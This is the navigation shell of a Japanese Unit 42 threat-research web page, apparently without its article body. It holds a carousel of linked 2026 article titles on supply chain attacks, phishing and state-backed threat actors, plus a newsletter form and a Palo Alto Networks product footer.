  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of Muddled Libra, aka Scattered Spider. A vibrant illustration of the Libra zodiac sign, featuring a stylized balance scale overlaid with a prominent Libra symbol. The background is a starry night sky with shades of purple and blue, suggesting a cosmic theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03-1-Muddle-Libra-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年2月10日 [#### Muddled Libraのプレイブックを覗いてみよう](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/)

* [Muddled Libra](https://unit42.paloaltonetworks.com/ja/tag/muddled-libra-ja/ "Muddled Libra")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")

* [Scattered Spider](https://unit42.paloaltonetworks.com/ja/tag/scattered-spider-ja/ "Scattered Spider")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/ "Muddled Libraのプレイブックを覗いてみよう")  
  ![Pictorial representation of threat groups from Russia. The silhouette of a bear and the Ursa constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/Ursa-Russia-B-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/ja/category/insights-ja/) 2026年1月29日 [#### 2026年冬季オリンピックに対するロシアのサイバー脅威を理解する](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/)

* [AI](https://unit42.paloaltonetworks.com/ja/tag/ai-ja/ "AI")

* [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/ "IoT")

* [Russia](https://unit42.paloaltonetworks.com/ja/tag/russia-ja/ "Russia")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/ "2026年冬季オリンピックに対するロシアのサイバー脅威を理解する")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
